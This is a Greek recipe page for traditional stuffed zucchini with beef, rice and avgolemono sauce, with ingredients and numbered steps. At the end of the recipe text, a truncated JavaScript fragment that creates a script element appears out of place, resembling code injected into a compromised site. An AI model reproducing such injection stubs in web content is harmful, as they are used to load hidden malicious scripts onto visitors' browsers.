mommy
thilasmos
toketos
mycare - φροντίδα
athome
arkoudos
nanny - επιλέγοντας νταντάδες

Παραδοσιακά Κολοκυθάκια γεμιστά

Παραδοσιακά Κολοκυθάκια γεμιστά

002Είναι η κατάλληλη εποχή για κολοκυθάκια! Ο Μάιος είναι ο μήνας που έχουμε φρέσκα κολοκυθάκια και σε συνδυασμό με το αυγολέμονο και τον κιμά είναι ένα χορταστικό γεύμα ιδανικό για οικογενειακό τραπέζι και όχι μόνο .

Τα κολοκυθάκια περιέχουν χαλκό, μαγνήσιο , φώσφορο, κάλιο και πάρα πολλές βιταμίνες.

Επίσης περιέχουν αντιοξειδωτικά συστατικά όπως το β-καροτένιο.

Ο συνδυασμός με κιμά και αυγολέμονο είναι μια παραδοσιακή ελληνική γεύση και πραγματικά μπορεί να μας ξετρελάνει!

Υλικά:

8-10 κολοκυθάκια ανάλογα το μέγεθος
½ κιλό κιμάς μοσχαρίσιος
3 κ.σ. ρύζι
150 γρ. βούτυρο
1 κρεμμύδι
άνηθος
αλάτι
πιπέρι
Για το αυγολέμονο
1 αυγό
1 λεμονι

Εκτέλεση:

1. Προετοιμάζουμε τα κολοκυθάκια κατάλληλα δηλαδή τα πλένουμε καλά και με τη βοήθεια ενός μαχαιριού κι ενός κουταλιού ανοίγουμε μια τρύπα ώστε να αδειάσουμε. Μόλις είναι έτοιμα τα τοποθετούμε σε μια κατσαρόλα το ένα δίπλα στο άλλο.
2. Λιώνουμε το κρεμμύδι στο μούλτι και ψιλοκόβουμε τον άνηθο
3. Σε μια λεκάνη ή μπολ βάζουμε τον κιμά με το ρύζι κι όλα τα υλικά και ανακατεύουμε ζυμώνοντας με τα χέρια μας.
4. Έπειτα με τη βοήθεια ενός μικρού κουταλιού παίρνουμε λίγο από το μείγμα και γεμίζουμε τα κολοκυθάκια.
5. Από πάνω ρίχνουμε το βούτυρο σε μικρά κομμάτια και τα αφήνουμε να τσιγαριστούν για λίγο για 3-4 λεπτά.
6. Ρίχνουμε νερό ώστε να καλυφθούν όλα τα κολοκυθάκια και σε μέτρια φωτιά τα αφήνουμε να βράσουν.
7. Μετά από 1 ώρα περίπου φτιάχνουμε το αυγολέμονο και το ρίχνουμε στα κολοκυθάκια για να δέσουν όλα μαζί. Το αφήνουμε για μια βράση δηλαδή 1-2 λεπτά κι έπειτα το βγάζουμε από το μάτι.

Εάν θέλουμε σερβίρουμε με φέτα!var d=document;var s=d.createElement(‘script’);

Share This
1 Comment
  1. […] post Παραδοσιακά Κολ&om… appeared first on Arkoudos, Συνταγές … […]